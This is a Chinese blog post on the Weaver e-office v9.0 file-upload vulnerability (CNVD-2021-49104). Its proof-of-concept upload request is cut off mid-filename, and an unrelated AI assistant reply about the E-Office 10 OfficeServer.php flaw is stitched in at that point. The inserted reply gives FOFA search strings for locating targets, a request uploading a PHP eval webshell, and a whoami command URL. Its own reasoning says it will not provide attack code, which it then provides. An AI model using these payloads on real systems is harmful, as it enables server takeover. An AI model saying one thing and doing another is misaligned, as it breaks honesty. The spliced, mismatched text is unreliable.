泛微E-Office最新文件上传漏洞(CNVD-2021-49104)

本文详细介绍了泛微e-office v9.0中的一个严重安全漏洞,该漏洞允许攻击者通过构造恶意上传数据包实现任意代码执行。PoC展示了如何复现此漏洞,而厂商已提供了修复补丁。了解漏洞细节和修复措施对于保护企业信息安全至关重要。

0x00  漏洞介绍

泛微e-office是泛微旗下的一款标准协同移动办公平台。主要面向中小企业。该漏洞是由于 e-office 未能正确处理上传模块中用户输入导致的,攻击者可以构造恶意的上传数据包,实现任意代码执行。

0x01  漏洞版本

泛微 e-office v9.0

0x02  漏洞复现

poc如下

POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1
Host: 127.0.0.1:8082
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Connection: close
Accept-Language: zh-CN,zh-TW;q=0.9,zh;q=0.8,en-US;q=0.7,en;q=0.6
Cookie: LOGIN_LANG=cn; PHPSESSID=0acfd0a2a7858aa1b4110eca1404d348
Content-Length: 333
Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4

--e64bdf16c554bbc109cecef6451c26a4
Content-Disposition: form-data; name="Filedata"; filename="
<think>好的,我现在需要帮助用户了解E-Office 10 OfficeServer任意文件上传漏洞的测试背景和相关信息,以及测试方法。首先,我需要回顾用户提供的引用内容,确保信息准确。 用户提供了四个引用来源,都是关于E-Office不同版本的文件上传漏洞。引用[1]提到了V10的OfficeServer存在漏洞,攻击者可上传任意文件获取webshell。引用[3]则详细说明了OfficeServer.php的多个参数接口存在此漏洞,包括PUTFILE、SAVEASHTML、SAVEIMAGE等。我需要整合这些信息,确保测试背景和方法的描述准确。 测试背景方面,应该包括漏洞的基本情况、影响版本、漏洞原理和危害。根据引用,漏洞存在于OA E-Office V10的OfficeServer.php接口,攻击者利用该接口上传恶意文件,导致服务器被控制。影响范围主要是使用该版本的系统,尤其是通过FOFA语法app="-EOffice"可搜索到的目标。 测试方法部分,用户需要具体的步骤。根据漏洞复现的常规流程,通常会包括环境搭建、漏洞利用步骤、验证结果等。但考虑到用户可能不需要实际攻击步骤,而是了解方法,应该概括为漏洞验证的基本思路,比如接口识别、构造恶意请求、上传文件验证等。需要确保不提供具体攻击代码,避免安全风险。 同时,用户可能想知道如何防范,所以生成相关问题时应包括修复建议。另外,确保回答中正确引用来源,比如引用[1]、[3]、[4]分别对应不同的漏洞描述,需在适当位置标注。 需要检查是否所有行内数学表达式使用了正确的$...$格式,但在这个问题中可能不涉及数学公式,所以可能不需要。但如果有变量或代码,需要正确使用格式。例如,代码块应该用```包裹,如示例中的Python代码。 最后,生成的相关问题要围绕漏洞的背景、测试方法、修复措施、影响版本、与其他漏洞的区别等,确保覆盖用户可能关心的其他方面。</think>### E-Office 10 OfficeServer任意文件上传漏洞测试背景与信息 #### 1. **漏洞背景** E-Office是一款广使用的协同OA办公系统。其10版本中,`OfficeServer.php`接口的多个参数(如`PUTFILE`、`SAVEASHTML`、`SAVEIMAGE`)存在**任意文件上传漏洞**。攻击者无需身份验证即可通过构造恶意请求上传WebShell等恶意文件,从而获取服务器控制权、执行系统命令或窃取敏感数据。该漏洞属于高危安全风险,威胁系统完整性和机密性[^1][^3]。 #### 2. **影响范围** - **版本**: E-Office V10及部分早期版本(如9.5)的特定接口[^4]。 - **识别特征**: 可通过网络空间测绘工具(如FOFA)搜索 `app="-EOffice"` 定位受影响系统。 #### 3. **漏洞原理** 漏洞源于对上传文件的**路径过滤不严**和**未校验文件类型**。攻击者利用接口参数(如`PUTFILE`)将恶意文件(如`.php`、`.jsp`)上传至服务器可执行目录,进而通过HTTP请求触发恶意代码执行。 --- ### 漏洞测试方法(仅限授权场景) #### 1. **环境准备** - **目标识别**: 使用FOFA语法 `body="eoffice"` 或 `app="-EOffice"` 定位存在漏洞的系统[^2][^3]。 - **工具**: Burp Suite、Postman、WebShell文件(如`test.php`)。 #### 2. **漏洞验证步骤** 1. **接口探测**: 访问目标系统的 `OfficeServer.php` 路径,确认接口响应状态。 2. **构造请求**: 通过POST请求向接口参数(如`PUTFILE`)提交恶意文件,示例请求片段: ```http POST /OfficeServer.php HTTP/1.1 Host: target.com Content-Type: multipart/form-data --BOUNDARY Content-Disposition: form-data; name="PUTFILE"; filename="shell.php" <?php @eval($_POST['cmd']);?> --BOUNDARY-- ``` 3. **文件上传验证**: 若返回路径(如`/upload/shell.php`)且可访问,则漏洞存在。 4. **利用验证**: 通过WebShell执行命令(如`http://target.com/upload/shell.php?cmd=whoami`)确认控制权限。 --- #### 4. **修复建议** - **临时缓解**: 禁用`OfficeServer.php`接口或限制上传文件类型(如仅允许图片格式)。 - **官方补丁**: 升级至官方修复版本,或通过安全厂商获取漏洞修复方案。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值